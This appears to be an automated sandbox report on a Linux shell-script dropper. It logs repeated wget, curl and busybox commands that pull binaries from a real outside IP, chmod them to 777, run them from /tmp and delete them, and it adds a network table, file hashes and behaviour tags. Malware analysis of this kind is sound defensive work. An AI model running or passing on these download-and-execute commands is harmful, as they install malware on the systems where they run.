[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 07:29

Reported

2024-11-21 07:31

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

11s

Max time network

128s

Command Line

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /bin/busybox N/A
